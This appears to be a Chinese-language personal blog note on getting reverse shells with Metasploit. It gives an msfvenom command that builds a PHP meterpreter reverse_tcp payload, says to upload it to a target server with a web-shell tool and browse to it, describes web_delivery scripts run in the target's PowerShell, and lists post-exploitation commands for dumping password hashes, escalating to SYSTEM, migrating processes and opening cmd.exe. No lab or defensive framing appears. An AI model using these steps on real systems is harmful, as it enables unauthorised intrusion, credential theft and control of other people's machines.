今天回顧了一下msf反彈shell的操作,在這里做一下記錄和分享。( ̄︶ ̄)↗
反彈shell的兩種方法

第一種Msfvenom實例:
1、msfconsole #啟動msf
2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php #生成反彈shell文件
LHOST表示本地攻擊機的ip, LPORT表示本地攻擊機的端口。
其他msf下的各種生成payload命令可參考:https://www.cnblogs.com/backlion/p/6000544.html

這樣我們就成功生成了一個shell.php文件。
3、接下來我們需要在本機中監聽4444端口。


這就表示開始本機開始監聽4444端口了。
4、現在把shell.php文件通過菜刀上傳至目標服務器中,然后本地游覽器訪問shell.php

即可以看見成功返回了一個session

sessions -i #查看當前可用會話


第二種web_delivery實例流程:
1、msfconsole #啟動msf

2、show options #目的是看exploit target為什么腳本
這里默認為pyhton,需要更改為php

show payloads #挑選payload,選擇php/meterpreter/reverse_tcp

然后設置lhost


得到一段腳本,將這段腳本在目標機的powershell中執行即可反彈shell。
下面貼一些常用的命令:
基礎命令:
seach cve-2017-7494 #查看是否存在指定漏洞
use exploit/multi/handler #使用exploit/multi/handler模塊
info #查看信息
show options #查看exp的參數 rhost 是遠程主機地址 lhost是本地主機地址
back #返回上一級
session -i #查看當前可用會話
sessions -i x #切換至會話x
session -k #殺死所有活躍會話
background #將會話放到后台
route #查看被控主機路由表
sysinfo #查看系統信息
run post/windows/gather/checkvm #檢查是否在虛擬機上運行
idletime #查看運行時間
getuid #獲得運行Meterpreter會話的用戶名,從而查看當前會話具有的權限
getsystem #通過各種攻擊向量來提升到系統用戶權限
getwd pwd #shell處於靶機的目錄
getlwd #本地的目錄位置
hashdump #導出目標主機中的口令哈希值
screenshot #對目標主機的屏幕進行截圖
backgroud #將當前Meterpreter shell轉為后台執行
quit #關閉當前Meterpreter會話,返回MSF終端
ps #顯示所有運行進程以及管聯的用戶賬戶
migrate PID #遷移到一個指定的進程PID
post/windows/manage/migrate #會自動尋找合適的進程進行遷移
execute -f cmd.exe -i #執行cmd.exe命令並進行交互
shell #以所有可用令牌來運行一個交互的shell